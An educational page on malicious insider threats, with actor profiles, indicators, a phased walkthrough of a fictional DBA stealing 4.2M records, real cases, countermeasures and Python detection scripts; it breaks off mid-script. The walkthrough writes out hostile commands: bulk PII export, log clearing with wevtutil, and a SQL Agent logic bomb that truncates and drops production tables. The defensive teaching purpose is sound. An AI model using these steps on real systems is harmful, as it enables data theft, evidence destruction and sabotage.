CLASSIFIED
CERT Insider Threat Center / MITRE ATT&CK T1078 - Valid Accounts / TA0010

MALICIOUS INSIDER THREAT - Deliberate Betrayal of Trust by Authorized Personnel

Unlike external attackers who must breach perimeter defenses, the malicious insider already holds the keys. They abuse legitimate, trusted access to exfiltrate sensitive data, steal credentials, sabotage systems, or sell access - often for months before detection.

HARDEST THREAT TO DETECT - OPERATES INSIDE ALL DEFENSES
Avg Detection Time: 216 days - average days before a malicious insider is detected, the longest of any threat category
Avg Cost Per Incident: $701K - average cost per malicious insider incident (Ponemon Institute 2023 Cost of Insider Threats Report)
Cases Financially Motivated: 62% - of malicious insider cases are driven by financial gain, through data theft, competitor sale, or fraud
Privilege Abuse Rate: 89% - of malicious insiders abused legitimate system privileges rather than exploiting technical vulnerabilities

01 / Motivations

62% - Financial Gain (PRIMARY DRIVER)
Selling proprietary data, customer records, or source code to competitors. Corporate espionage contracts, dark web data sales, or theft of funds via fraudulent transactions. Often triggered by personal financial distress or greed.
21% - Grievance & Revenge (DISGRUNTLEMENT)
Retaliation for perceived unfair treatment: denied promotion, disciplinary action, or termination. Sabotage of systems, deletion of critical data, or exposure of confidential information as revenge. Often escalates rapidly after a triggering event.
12% - Ideology / Espionage (STATE-SPONSORED)
Nation-state recruited or ideologically motivated insiders passing classified information to foreign intelligence services. Defense, government, and technology sector employees are primary targets for recruitment by hostile state actors.
5% - Coercion / Compromise (INVOLUNTARY ACTOR)
Employee is blackmailed, extorted, or threatened into providing access or stealing data. May have been compromised externally first (gambling debts, personal secrets) and subsequently weaponized by criminal or state actors.

02 / Threat Actor Profiles

PROFILE - MIT-001 // ACTIVE
👨‍💼 The Departing Employee - IT SYSTEM ADMIN, 7 YRS TENURE
  • Accepted competitor job offer 3 weeks prior
  • Bulk download of proprietary codebase to personal USB
  • Accessed systems not required for current role
  • Disabled audit logging on his own workstation
  • Transferred 40GB to personal Google Drive last week
RISK: IP THEFT - COMPETITOR TRANSFER

PROFILE - MIT-002 // ACTIVE
👩‍💻 The Disgruntled DBA - DATABASE ADMINISTRATOR, FINANCE
  • Recently passed over for promotion - filed HR complaint
  • Accessing customer PII tables outside business hours
  • Ran SELECT * queries on 2.4M customer records
  • Created undocumented database user accounts
  • Searched internally for "how to cover tracks database"
RISK: DATA EXFIL - SABOTAGE

PROFILE - MIT-003 // ACTIVE
🕵️ The Recruited Spy - SENIOR ENGINEER, R&D DIVISION
  • Unexplained foreign travel - 3 trips in 6 months
  • Contacted via LinkedIn by foreign national (handler)
  • Accessing classified project files outside his clearance
  • Encrypted USB drives found on premises
  • Financial windfall unexplained by known income sources
RISK: IP THEFT - ESPIONAGE

PROFILE - MIT-004 // ACTIVE
🧑‍🏫 The Privileged Abuser - HELPDESK ADMIN, OPERATIONS
  • Resetting executive passwords without ticket authorization
  • Sold admin credentials on dark web forum (detected by CTI)
  • Logging into executive accounts using shared service creds
  • Forwarding C-suite emails to external address
  • Purchasing cryptocurrency with work equipment
RISK: CRED SALE - ACCESS BROKER

PROFILE - MIT-005 // ACTIVE
👨‍⚕️ The Healthcare Fraudster - BILLING SPECIALIST, HOSPITAL NETWORK
  • Accessing patient records unrelated to assigned caseload
  • Viewed 3,200 patient SSNs over 4 months
  • Submitting fraudulent insurance claims using real patient IDs
  • Second job found at competing clinic with same patient data
  • Emailing patient records to personal Gmail account
RISK: HIPAA BREACH - IDENTITY FRAUD

PROFILE - MIT-006 // ACTIVE
🧑‍💼 The Saboteur - DEVOPS ENGINEER, INFRASTRUCTURE
  • Termination notice issued - 2 weeks remaining
  • Creating backdoor admin accounts in production systems
  • Modified infrastructure-as-code with time-delayed deletion
  • Revoked SSH keys for other team members
  • Accessed prod database with DROP TABLE commands staged
RISK: SABOTAGE - LOGIC BOMB

03 / Indicators of Compromise (IOC)

Behavioral Indicators
Warning signals that security teams should monitor for - individually subtle, collectively damning.
[HIGH] BULK DATA EXFILTRATION
Abnormal volume of data moved to external USB, personal cloud storage, or non-business email. DLP alerts on 100+ files in a single session or >1GB upload to consumer cloud services.
[HIGH] AFTER-HOURS ACCESS TO SENSITIVE SYSTEMS
Logins to restricted systems at 2–5 AM that deviate significantly from the user's established baseline. Night-shift access on systems that have no business justification for out-of-hours use.
[HIGH] PRIVILEGE ESCALATION WITHOUT TICKET
Admin account creation, permission changes, or access elevation that do not correspond to any open IT service ticket. Self-grants of elevated privileges are a critical red flag.
[MED] ACCESSING RESOURCES OUTSIDE ROLE
An HR manager repeatedly accessing R&D source code repositories, or a sales rep querying the payroll database. UEBA baselines normal access patterns and alerts on outliers.
[MED] AUDIT LOG TAMPERING
Disabling audit trails, clearing event logs, or modifying timestamps. Technically sophisticated insiders attempt to erase evidence of their activity. The absence of expected logs is itself evidence.
[LOW] DISGRUNTLEMENT PRECURSORS
HR events (PIP, termination notice, denied raise), sudden change in attitude, negative social media posts about employer, or unexplained financial changes - correlate HR data with system behavior.
UEBA Anomaly Detection
Simulated behavioral analytics showing normal vs. anomalous file access pattern for a single user over 30 days:
DAILY FILE ACCESS COUNT - USER: j.chen@corp.internal
[chart: daily file access count, x-axis Day 1 to Day 28 - not reproduced in text]
UEBA ALERT TIMELINE
  • Day 23 ⚠ File access 4.2× above baseline - alert raised
  • Day 24 🔴 800 files accessed - DLP rule triggered
  • Day 25 🔴 External USB write detected - 14GB
  • Day 26 ⚡ HR notified: 2-week notice submitted yesterday
  • Day 26 ✓ Account suspended - forensic investigation started

KEY INSIGHT

Without UEBA correlating the HR offboarding event with the file access spike, this activity would have appeared as normal elevated usage. Context is everything in insider threat detection.
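To make the key insight concrete, here is an added example (not code from the original page) of the two rules the timeline above implies: a per-user rolling baseline with a deviation threshold, and escalation of any alert that lands within a few days of an HR event. The 28-day series and the HR event day are constructed to mirror the Day 1-28 timeline; the window length, the 3× ratio, the 500-file ceiling and the 7-day correlation window are assumptions, not values from the page.

```python
"""Toy UEBA rule: per-user daily baseline, deviation alert, HR-event escalation.

Added example for this page, not code from the original. The daily counts and
the HR event below are CONSTRUCTED to mirror the page's Day 1-28 timeline (the
real data source would be a file-audit or EDR feed).
"""
from dataclasses import dataclass
from statistics import median
from typing import Dict, Iterable, List, Optional

WINDOW_DAYS = 21          # trailing window used to learn the baseline (assumed)
RATIO_THRESHOLD = 3.0     # alert when today's count >= 3x the baseline (assumed)
ABSOLUTE_THRESHOLD = 500  # DLP-style hard ceiling regardless of baseline (assumed)
HR_CORRELATION_DAYS = 7   # escalate alerts within +/- 7 days of an HR event (assumed)

# Constructed 28-day file-access series for j.chen: ~50 files/day for three
# weeks (median exactly 50), a 4.2x spike on day 23, 800 files on day 24,
# then zero once the account is suspended on day 26.
ACCESS_COUNTS: Dict[int, int] = {
    1: 48, 2: 52, 3: 47, 4: 55, 5: 50, 6: 49, 7: 53,
    8: 51, 9: 49, 10: 50, 11: 46, 12: 54, 13: 50, 14: 52,
    15: 48, 16: 50, 17: 51, 18: 49, 19: 50, 20: 47, 21: 53,
    22: 58, 23: 210, 24: 800, 25: 120, 26: 0, 27: 0, 28: 0,
}
# Constructed HR feed: two-week notice submitted on day 25 (SOC told on day 26).
HR_EVENT_DAYS = [25]


@dataclass
class Alert:
    day: int
    count: int
    baseline: float
    ratio: float
    severity: str


def rolling_baseline(counts: Dict[int, int], day: int) -> Optional[float]:
    """Median count over the WINDOW_DAYS days before `day`, or None while the
    history is too short. Median rather than mean, so that the day-23 spike
    does not lift the baseline and mask day 24."""
    window = [counts[d] for d in range(day - WINDOW_DAYS, day) if d in counts]
    if len(window) < WINDOW_DAYS:
        return None  # stay silent rather than alert on a guessed baseline
    return float(median(window))


def detect(counts: Dict[int, int], hr_event_days: Iterable[int] = ()) -> List[Alert]:
    """One Alert per day that breaks the ratio rule or the absolute ceiling.
    Any alert within HR_CORRELATION_DAYS of an HR event is raised to CRITICAL:
    that correlation is the 'context' the key insight above refers to."""
    hr_days = list(hr_event_days)
    alerts: List[Alert] = []
    for day in sorted(counts):
        base = rolling_baseline(counts, day)
        if base is None:
            continue
        count = counts[day]
        if base > 0:
            ratio = count / base
        else:
            ratio = float("inf") if count else 0.0
        if count >= ABSOLUTE_THRESHOLD:
            severity = "HIGH"      # volume rule, like the page's DLP trigger
        elif ratio >= RATIO_THRESHOLD:
            severity = "MEDIUM"    # behavioural deviation only
        else:
            continue
        if any(abs(day - h) <= HR_CORRELATION_DAYS for h in hr_days):
            severity = "CRITICAL"  # offboarding context changes the meaning
        alerts.append(Alert(day, count, base, round(ratio, 2), severity))
    return alerts


if __name__ == "__main__":
    for a in detect(ACCESS_COUNTS, HR_EVENT_DAYS):
        print(f"Day {a.day:>2}: {a.count:>4} files, {a.ratio:>5}x baseline "
              f"{a.baseline:.0f} -> {a.severity}")
```

Run as a script, it prints two alerts: day 23 (210 files, 4.2× the median baseline of 50) and day 24 (800 files, over the absolute ceiling). Both become CRITICAL only because the notice submitted on day 25 falls inside the correlation window; call detect() without the HR feed and they are MEDIUM and HIGH, which is the "normal elevated usage" the key insight warns about.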


04 / Attack Flow Diagram

Attack flow (diagram rendered as text):
① INSIDER ACTS - 👤 Malicious insider: trusted employee
② ATTACK VECTOR - 🔑 Cred abuse (selling / sharing) · 💾 Data theft (exfil to USB/cloud) · 💣 Sabotage (logic bombs / delete)
③ COVER TRACKS - 🧹 Clear logs / encrypt
④ EXFILTRATE - 📤 USB / mail / cloud; data sold / used / leaked
⑤ IMPACT - 🏭 Competitor (IP / trade secrets) · 💰 Dark web sale · 💥 Sabotage (data destruction)
AVG DWELL TIME: 216 DAYS UNDETECTED

05 / Step-by-Step Walkthrough

Phase 01 - Triggering Event

GRIEVANCE & MOTIVATION

😤
INSIDER PROFILE
Marcus Chen - Senior DBA, 9 Years

A triggering event crystallizes the insider's intent. Marcus was passed over for promotion, received a Performance Improvement Plan he considers unjust, and has begun a job search. His mindset shifts from loyal employee to adversary - while still holding full database administrator privileges.

  • Denied promotion despite 9 years of service - junior colleague promoted instead
  • PIP issued - Marcus believes it's retaliation, documents grievance with HR
  • Starts interviewing with competitors - reaches out to former colleagues at rival firms
  • Rationalization: "The company owes me - this data is worth more to them than they paid me"
  • Begins mentally cataloguing what access he has and what would be valuable externally
MARCUS'S INTERNAL MONOLOGUE

"I've built half this database infrastructure. I know where every record lives. They gave the promotion to a 3-year junior who couldn't write a JOIN query when I hired him. I have admin rights to everything. They should have thought about that before the PIP."

MISSED HR WARNING SIGNALS
LinkedIn profile updated to "Open to Work" - not flagged
Formal HR complaint filed - not correlated with system access review
Manager reports Marcus "seems withdrawn and resentful" - not escalated
No privilege review triggered by PIP issuance - access unchanged

DETECTION OPPORTUNITY MISSED

Best practice: HR events (PIP, termination notice, failed promotion) should automatically trigger a privileged access review and elevated monitoring - Marcus's DBA rights should have been scoped down immediately.

Phase 02 - Reconnaissance & Access

ABUSING LEGITIMATE ACCESS

🔑
ADVANTAGE
Trusted Admin - No Alerts Raised

Unlike an external attacker, Marcus needs no exploits. His legitimate DBA credentials give him unrestricted access to production databases containing 4.2 million customer records. He uses standard SQL tools that appear entirely normal in logs - the attack is invisible to signature-based security.

  • Uses his own DBA account - no credential theft needed, activity appears fully legitimate
  • Queries customer database schema to identify most valuable tables (PII, payment, credentials)
  • Accesses competitor-relevant R&D project data outside his normal DBA scope
  • Identifies which tables contain salary data - CEO compensation, acquisition financials
  • Notes that audit logging on the customer table is configured to log only DDL, not SELECT queries
SQL Server - Marcus DBA session (11:34 PM)
-- Enumerate highest-value tables
1> SELECT TABLE_NAME, TABLE_ROWS FROM information_schema.TABLES ORDER BY TABLE_ROWS DESC;
   customers          4,218,004 rows  ← TARGET
   payment_methods    3,891,220 rows  ← TARGET
   employee_salary       12,840 rows
   orders            28,440,112 rows
-- Verify audit logging config
1> SELECT * FROM sys.database_audit_specifications
   SELECT_action_id: NOT LOGGED  ← no audit trail
[+] SELECT queries on customer table unmonitored
Phase 03 - Data Preparation

STAGING THE DATA

💾
OPERATION
4.2M Records Extracted & Packaged

Marcus extracts the data over several sessions spread across two weeks, limiting per-session volume to avoid DLP thresholds. He uses legitimate database tools for the extraction and compresses the output to reduce file size before staging for exfiltration.

  • Uses BCP (Bulk Copy Program) - a standard SQL Server tool, not a hacking utility
  • Splits extraction across 14 nightly sessions (300K records each) to stay below DLP alert thresholds
  • Exports to encrypted 7-zip archives using a password only he knows
  • Stores staged files in a hidden folder within a legitimate project directory on his workstation
  • Compresses 4.2M records with PII and payment data down to 2.8GB encrypted archive
cmd.exe - data staging (nightly, 1-2 AM)
:: Night 1 of 14 - staged extraction
C:\> bcp "SELECT TOP 300000 * FROM customers" queryout chunk01.dat -S PROD-SQL01 -T -c
Starting copy...
300000 rows copied.
:: Encrypt with strong passphrase
C:\> 7z a -p"Revenge#2024!" -mhe=on C:\Users\mchen\AppData\Local\Temp\.proj\archive.7z chunk01.dat
Everything is OK - encrypted
:: Running for 14 nights
Total staged: 4,218,004 records | 2.8 GB
Contents: name, email, SSN, card_hash, address
DLP alert threshold: 500K/session - NOT triggered
Phase 04 - Anti-Forensics

COVERING TRACKS

🧹
OBJECTIVE
Destroy Evidence Before Departure

Before his final week, Marcus systematically attempts to remove forensic evidence of his activity. With DBA rights, he can modify database audit configurations and clear certain system logs - though he underestimates what Windows event logging, SIEM, and network flow captures retain independently.

  • Clears Windows Security event log on his workstation using wevtutil cl Security
  • Modifies SQL Server audit policy to remove trace of his custom extraction sessions
  • Deletes the temporary staging folder - but doesn't account for VSS shadow copies
  • Uses CCleaner to overwrite free space on his workstation - doesn't know SIEM already shipped logs
  • Fails to clear network flow records or the SIEM's centralized log aggregation - critical oversight
PowerShell (Admin) - anti-forensics
# Attempt to clear local Windows logs
PS> wevtutil cl Security
Cleared successfully
PS> wevtutil cl System
Cleared successfully
# Delete staged data folder
PS> Remove-Item -Recurse -Force "C:\...\Temp\.proj"
Deleted
# What Marcus DOESN'T know:
SIEM received all Windows events in real-time
VSS shadow copies retain .proj folder
Network flows logged: 2.8GB upload to dropbox.com
SQL Server trace log retained on separate server ✓
Phase 05 - Data Exfiltration

GETTING THE DATA OUT

📤
STATUS
4.2M Records - Leaving the Building

With data staged and logs (he believes) cleared, Marcus executes exfiltration via multiple channels on his penultimate workday. He uses both physical media and cloud storage to create redundancy. He's already in contact with a data broker who has agreed to pay $45,000 for the customer database.

  • Copies 2.8GB encrypted archive to a personal USB drive brought from home
  • Uploads the same archive to his personal Dropbox account via the corporate network
  • Emails himself a second copy using a ProtonMail address created from a coffee shop WiFi
  • A dark web data broker has been contacted via Tor - $45,000 agreed for the full customer dump
  • Marcus has already received a $5,000 "good faith" cryptocurrency deposit
exfiltration - penultimate day
# USB write - corporate workstation
C:\> xcopy archive.7z E:\ /Y
1 File(s) copied - 2.8 GB to USB ✓
# Dropbox upload via corporate network
# (Firewall allows Dropbox - not blocked)
Uploading: archive.7z → dropbox.com/mchen_personal
Progress: ████████████████ 100%  2.8 GB
# Dark web transaction (Tor browser, home)
Broker confirms: 4.2M FULL records received
Payment: 0.92 BTC (~$40,000) - transferred
[!] Data now in criminal possession
Phase 06 - Alternative Vector

SABOTAGE - THE LOGIC BOMB

💣
VECTOR
Time-Delayed Destruction

Not all malicious insiders are motivated by profit. In this scenario - or in addition to theft - Marcus plants a logic bomb: code designed to execute destructive actions automatically after his departure, when he can no longer be immediately blamed. This is a common pattern among DevOps and DBA personnel who are being terminated.

  • Creates a SQL Server Agent job scheduled to run 30 days after his last day
  • Job executes: TRUNCATE TABLE on customers, orders, and payment_methods tables
  • Plants a backdoor stored procedure disguised as a maintenance routine for remote re-entry
  • Modifies database backup rotation policy to overwrite old backups - recovery becomes impossible
  • Sets job owner to a service account - removes his name from the scheduled task
SQL Server - logic bomb deployment
-- Create logic bomb as scheduled maintenance job
1> EXEC msdb.dbo.sp_add_job @job_name = 'DB_Maintenance_Weekly_Cleanup', @owner_login_name = 'sa'; -- hide attribution
-- Schedule: 30 days after his last day
1> EXEC msdb.dbo.sp_add_schedule @schedule_name = 'Weekly', @freq_type = 1, @active_start_date = 20241115; -- future date
-- Payload: destroy all production data
TRUNCATE TABLE customers; -- 4.2M rows
TRUNCATE TABLE payment_methods; -- 3.9M rows
DROP TABLE order_history; -- permanent
[!] Bomb planted - triggers 30 days post-departure
Phase 07 - Investigation & Aftermath

DISCOVERY & RESPONSE

🔍
TRIGGER
Threat Intel Feed - Data Seen on Dark Web

Six weeks after Marcus's departure, a threat intelligence service alerts the company that a tranche of their customer data is being sold on a dark web forum. The IR team pulls SIEM logs, network flows, and VSS shadow copies - and reconstructs the entire attack despite Marcus's cleanup attempts.

  • Threat intel feed identifies company's customer data for sale on BreachForums - $45K listing
  • SIEM retained all Windows Security events forwarded in real-time - Marcus's log clearing failed
  • Network flow analysis shows 2.8GB upload to Dropbox from Marcus's workstation on his penultimate day
  • VSS shadow copies recovered the deleted staging folder with extraction scripts intact
  • Logic bomb discovered during IR sweep of SQL Server Agent jobs - defused before trigger date
IR team - forensic reconstruction
# SIEM query - Marcus Chen activity
$ splunk search "user=mchen EventCode=4663" earliest=-90d
2,847 file access events - CUSTOMERS table
14 bulk export sessions - 1:00-2:30 AM nightly
# Network flow evidence
SRC: 10.4.12.88 (mchen-ws) → dropbox.com
Bytes: 2,986,444,032 - archive.7z upload
Timestamp: 2024-10-14 16:42:31
# VSS shadow copy recovery
Recovered: C:\Temp\.proj\chunk*.dat (14 files)
Recovered: extraction_script.sql - signed mchen
[CRITICAL] Logic bomb found - defused ✓
[BREACH] 4.2M customer records confirmed stolen

06 / Notable Real-World Cases

2013 - NSA CONTRACTOR
Edward Snowden
NSA / BOOZ ALLEN HAMILTON
NSA contractor used his sysadmin access and a web crawler to exfiltrate 1.5 million classified documents over several months. Exploited coworker credentials to access compartments beyond his clearance. Ideologically motivated - revealed mass surveillance programs to journalists.
Files: 1.5M classified
Motive: Ideology
Tenure: 3 months at NSA
2020 - TESLA / GIGAFACTORY
Egor Kriuchkov
TESLA GIGAFACTORY - EXTERNAL RECRUITER
Russian criminal offered Tesla employee $1M in cash to plant malware on the Nevada Gigafactory network as part of a ransomware operation. The targeted employee reported the approach to Tesla and the FBI - Kriuchkov was arrested. Rare case of employee integrity foiling the plot.
Offer: $1M BTC
Method: Recruitment / Coercion
Outcome: Foiled - employee reported
2022 - CISCO SABOTAGE
Sudhish Kasaba Ramesh
CISCO SYSTEMS - FORMER ENGINEER
Cisco engineer resigned, then five months later used retained AWS credentials (never revoked) to log into Cisco's production environment and deploy code that deleted 456 virtual machines running WebEx Teams. Caused $1.4M in damages, took 2 weeks to restore service for 16,000 customers.
Damage: $1.4M / 16K customers
Access: Credentials never revoked
Sentence: 24 months federal prison
2023 - FINANCIAL SECTOR
JPMorgan Chase - Data Theft
JPMORGANCHASE - WEALTH MANAGEMENT
A wealth management associate exfiltrated customer account data for 9 months, emailing client financial information including account balances, portfolio holdings, and PII to a personal Gmail account. Used legitimate client access portals - no special tools required. Sold information to investment competitors.
Duration: 9 months undetected
Method: Legitimate portals + Gmail
Motive: Financial - competitor sale

07 / Defensive Countermeasures

👁️
UEBA - Behavioral Analytics
User and Entity Behavior Analytics establishes individual baselines and alerts on deviations - after-hours access, bulk downloads, unusual query patterns. Context-aware: correlates HR events (PIP, notice) with access anomalies in real time.
🔐
Privileged Access Management (PAM)
All privileged actions require checkout through a PAM vault (CyberArk, BeyondTrust). Sessions recorded, commands logged, credentials rotated automatically. Prevents credential sharing and provides full session replay for forensic investigation.
📤
Data Loss Prevention (DLP)
Block or alert on bulk file transfers to USB, personal cloud storage, and webmail. Content inspection identifies sensitive data (SSNs, card numbers, IP) in outbound transfers. Network DLP monitors encrypted uploads and unusual data volumes at the egress point.
🚪
Immediate Revocation on Departure
All accounts, tokens, VPN certificates, and cloud credentials revoked on the employee's last minute - not days later. Automated offboarding workflow triggered by HRIS. The Cisco Ramesh case was entirely enabled by credentials active 5 months post-resignation.
🔗
HR–Security Integration
Bidirectional data sharing between HR and the SOC. PIPs, denied promotions, termination notices, and formal complaints automatically trigger elevated monitoring and privilege reviews. The security team treats HR events as threat intelligence signals.
🔍
Least Privilege & Need-to-Know
Grant access only to resources required for the current role. Regular access certification reviews remove accumulated permissions. Just-in-time (JIT) access for sensitive operations: elevated privileges granted only for the duration of an approved task, then auto-revoked.
📋
Database Activity Monitoring
Log ALL query types including SELECT - not just DDL. Alert on: bulk SELECT with no WHERE clause, queries outside business hours, queries from unusual IP addresses, and export operations. Marcus's extraction would have been detected on night one with proper DAM coverage.
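As an added example of the DAM rules listed above (not code from the page or from any DAM product), the script below applies the four rules to constructed audit records in the shape a SQL Server audit or database proxy would emit. Record 0 mirrors the night-one extraction from the walkthrough; the sensitive-table list, the 07:00-18:59 business-hours window, the service-account exemption and the per-login known-IP allowlist are assumptions.

```python
"""Database Activity Monitoring (DAM) rules run over sample SQL audit records.

Added example for this page, not code from the original or from any DAM
product. Input records are CONSTRUCTED in the shape a SQL Server audit would
emit (timestamp, login, client host/IP, application name, statement text).
"""
import re
from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, List, Optional, Set

SENSITIVE_TABLES = {"customers", "payment_methods", "employee_salary"}  # assumed
EXPORT_TOOLS = {"bcp"}             # bulk-export client application names (assumed)
OFF_HOURS_EXEMPT = {"backup_svc"}  # service accounts expected to run at night (assumed)
BUSINESS_HOURS = range(7, 19)      # 07:00-18:59 local (assumed)

# Constructed audit records. Record 0 mirrors the walkthrough's night-one bcp run.
SAMPLE_EVENTS = [
    {"ts": "2024-10-01T01:12:00", "login": "mchen", "host": "mchen-ws",
     "ip": "10.4.12.88", "app": "bcp",
     "stmt": "SELECT TOP 300000 * FROM customers"},
    {"ts": "2024-10-01T10:05:00", "login": "app_svc", "host": "app-01",
     "ip": "10.4.20.5", "app": ".Net SqlClient Data Provider",
     "stmt": "SELECT name, email FROM customers WHERE customer_id = @p1"},
    {"ts": "2024-10-01T14:30:00", "login": "mchen", "host": "mchen-ws",
     "ip": "10.4.12.88", "app": "SSMS",
     "stmt": "ALTER INDEX ALL ON orders REBUILD"},
    {"ts": "2024-10-02T09:15:00", "login": "mchen", "host": "unknown",
     "ip": "203.0.113.7", "app": "SSMS",
     "stmt": "SELECT * FROM employee_salary"},
    {"ts": "2024-10-02T02:40:00", "login": "backup_svc", "host": "PROD-SQL01",
     "ip": "10.4.10.2", "app": "SQLAgent",
     "stmt": "BACKUP DATABASE prod TO DISK = 'E:\\bak\\prod.bak'"},
]
# Constructed per-login allowlist of source IPs learned over the prior 90 days.
KNOWN_IPS: Dict[str, Set[str]] = {
    "mchen": {"10.4.12.88"},
    "app_svc": {"10.4.20.5"},
    "backup_svc": {"10.4.10.2"},
}


@dataclass
class Finding:
    index: int
    login: str
    rules: List[str] = field(default_factory=list)
    severity: str = "MEDIUM"


def _target_table(stmt: str) -> Optional[str]:
    """Name of the first table after FROM, with any schema prefix stripped."""
    m = re.search(r"\bFROM\s+(?:\[?\w+\]?\.)*\[?(\w+)\]?", stmt, re.I)
    return m.group(1).lower() if m else None


def rules_for(ev: dict, known_ips: Dict[str, Set[str]]) -> List[str]:
    """Apply the four rules from the page, in a fixed order."""
    hits: List[str] = []
    stmt = ev["stmt"]
    # 1. bulk SELECT on a sensitive table with no WHERE clause
    if (re.match(r"\s*SELECT\b", stmt, re.I)
            and _target_table(stmt) in SENSITIVE_TABLES
            and not re.search(r"\bWHERE\b", stmt, re.I)):
        hits.append("bulk_select_no_where")
    # 2. activity outside business hours (known service accounts exempt)
    hour = datetime.fromisoformat(ev["ts"]).hour
    if hour not in BUSINESS_HOURS and ev["login"] not in OFF_HOURS_EXEMPT:
        hits.append("off_hours")
    # 3. source IP never seen for this login
    if ev["ip"] not in known_ips.get(ev["login"], set()):
        hits.append("unusual_source_ip")
    # 4. export tooling (bcp queryout and similar)
    if ev["app"].lower() in EXPORT_TOOLS:
        hits.append("export_tool")
    return hits


def evaluate(events, known_ips: Dict[str, Set[str]]) -> List[Finding]:
    """Two or more rules on one statement is treated as HIGH; one rule is MEDIUM."""
    findings: List[Finding] = []
    for i, ev in enumerate(events):
        hits = rules_for(ev, known_ips)
        if hits:
            findings.append(Finding(i, ev["login"], hits,
                                    "HIGH" if len(hits) >= 2 else "MEDIUM"))
    return findings


if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS, KNOWN_IPS):
        print(f"[{f.severity}] record {f.index} login={f.login} rules={f.rules}")
```

The night-one record trips three rules at once (bulk SELECT with no WHERE, off-hours, export tool), which is what the page means by "detected on night one": none of the rules needs a signature, only the SELECT audit that the walkthrough's server was not keeping. The backup service account at 02:40 produces nothing because it is exempt from the off-hours rule and its IP is known, which is the allowlisting needed to keep the rule from paging on every maintenance window.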
🛡️
Logic Bomb Prevention
Audit all scheduled tasks, cron jobs, and SQL Agent jobs before and after any employee departure. Require two-person approval for scheduled destructive operations in production environments. Scan for time-delayed code during offboarding of privileged technical staff.
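An added example (not the page's code) of the "audit all SQL Agent jobs before and after any employee departure" control: compare a baseline snapshot of msdb job definitions with the current one, and scan every job for destructive statements and one-time schedules dated after the audit. The snapshot rows are constructed (a job modelled on the walkthrough's logic bomb appears in the current set, and a backup job has been quietly altered); the column names follow msdb.dbo.sysjobs / sysjobsteps / sysschedules, and freq_type 1 = once is the documented sp_add_schedule value. The destructive-statement pattern is an assumption and deliberately narrow.

```python
"""Offboarding audit of SQL Server Agent jobs: snapshot diff plus content scan.

Added example for this page, not code from the original. Both snapshots are
CONSTRUCTED in the shape of a join over msdb.dbo.sysjobs / sysjobsteps /
sysschedules (job_name, owner, freq_type, active_start_date, command).
"""
import re
from datetime import date
from typing import Dict, List

ONE_TIME = 1  # sysschedules.freq_type: 1 = once, 4 = daily, 8 = weekly

# Assumed list of statements that should never sit in an unattended job.
DESTRUCTIVE = re.compile(
    r"\bTRUNCATE\s+TABLE\b|\bDROP\s+(?:TABLE|DATABASE)\b"
    r"|\bDELETE\s+FROM\s+[\w.\[\]]+\s*(?:;|$)",   # DELETE with no WHERE
    re.I | re.M,
)

BASELINE_JOBS = [  # constructed: snapshot taken the day notice was given
    {"job_name": "Nightly_Backup", "owner": "sa", "freq_type": 4,
     "active_start_date": 20230101,
     "command": "BACKUP DATABASE prod TO DISK = 'E:\\bak\\prod.bak'"},
    {"job_name": "Index_Maintenance", "owner": "sa", "freq_type": 8,
     "active_start_date": 20230101,
     "command": "ALTER INDEX ALL ON orders REORGANIZE"},
]
CURRENT_JOBS = [  # constructed: snapshot taken on the employee's last day
    {"job_name": "Nightly_Backup", "owner": "sa", "freq_type": 4,
     "active_start_date": 20230101,
     # WITH INIT overwrites the existing backup set: the "rotation" change
     "command": "BACKUP DATABASE prod TO DISK = 'E:\\bak\\prod.bak' WITH INIT"},
    {"job_name": "Index_Maintenance", "owner": "sa", "freq_type": 8,
     "active_start_date": 20230101,
     "command": "ALTER INDEX ALL ON orders REORGANIZE"},
    {"job_name": "DB_Maintenance_Weekly_Cleanup", "owner": "sa", "freq_type": 1,
     "active_start_date": 20241115,
     "command": "TRUNCATE TABLE customers;\nTRUNCATE TABLE payment_methods;\n"
                "DROP TABLE order_history;"},
]


def _as_date(yyyymmdd: int) -> date:
    """sysschedules stores dates as YYYYMMDD integers."""
    return date(yyyymmdd // 10000, (yyyymmdd // 100) % 100, yyyymmdd % 100)


def audit_jobs(baseline, current, audit_date: date) -> Dict[str, List[str]]:
    """Return {job_name: [reasons]} for every job that needs a human review.

    The baseline snapshot is what makes 'new' and 'modified' detectable at all,
    so take it the moment HR flags a departure, not on the last day. Owner is
    deliberately not a signal: the walkthrough's job is owned by 'sa'."""
    before = {j["job_name"]: j for j in baseline}
    findings: Dict[str, List[str]] = {}
    for job in current:
        reasons: List[str] = []
        prev = before.get(job["job_name"])
        if prev is None:
            reasons.append("new_since_baseline")
        elif prev != job:
            reasons.append("modified_since_baseline")
        if DESTRUCTIVE.search(job["command"]):
            reasons.append("destructive_statement")
        if (job["freq_type"] == ONE_TIME
                and _as_date(job["active_start_date"]) > audit_date):
            reasons.append("one_time_future_run")
        if reasons:
            findings[job["job_name"]] = reasons
    # A job that vanished since baseline (e.g. a removed backup) is also a finding.
    for name in before.keys() - {j["job_name"] for j in current}:
        findings[name] = ["deleted_since_baseline"]
    return findings


if __name__ == "__main__":
    for name, why in audit_jobs(BASELINE_JOBS, CURRENT_JOBS, date(2024, 10, 18)).items():
        print(f"REVIEW {name}: {', '.join(why)}")
```

Run against the constructed snapshots, the cleanup job is reported for three independent reasons (new, destructive, one-time future run), so it is caught even if the naming and the 'sa' owner look routine; the backup job is reported only because its command text changed, which is exactly the kind of edit a content scan alone would miss. Pair the script with two-person approval: anything it lists should not run until a second administrator has read the command text.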
🔒
Immutable Centralized Logging
Forward all security events to a centralized SIEM in real time - separate from systems the insider controls. WORM (Write-Once-Read-Many) log storage that cannot be deleted even by administrators. Marcus's local log clearing had zero impact because the SIEM already had everything.
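As an added example (not from the page or any SIEM vendor) of why the SIEM copy wins, here are two checks that can only run on the centralized copy of forwarded Windows events: flag the "log was cleared" records themselves, and flag any inventoried host that stops reporting. The event stream, host inventory and time window are constructed; Security event 1102 and System event 104 are the real Windows IDs written when those logs are cleared, and the 30-minute silence threshold is an assumption.

```python
"""SIEM-side integrity checks on forwarded Windows logs: audit-log clearing and
hosts that go silent.

Added example for this page, not code from the original or any SIEM product.
Events are CONSTRUCTED in a minimal (timestamp, host, event_id, user) shape.
Security event 1102 ("The audit log was cleared") and System event 104 ("The
System log file was cleared") are the real IDs a wevtutil cl leaves behind.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Tuple

LOG_CLEARED_IDS = {1102, 104}
Event = Tuple[str, str, int, str]  # (iso_timestamp, host, event_id, user)


def _t(hhmm: str) -> str:
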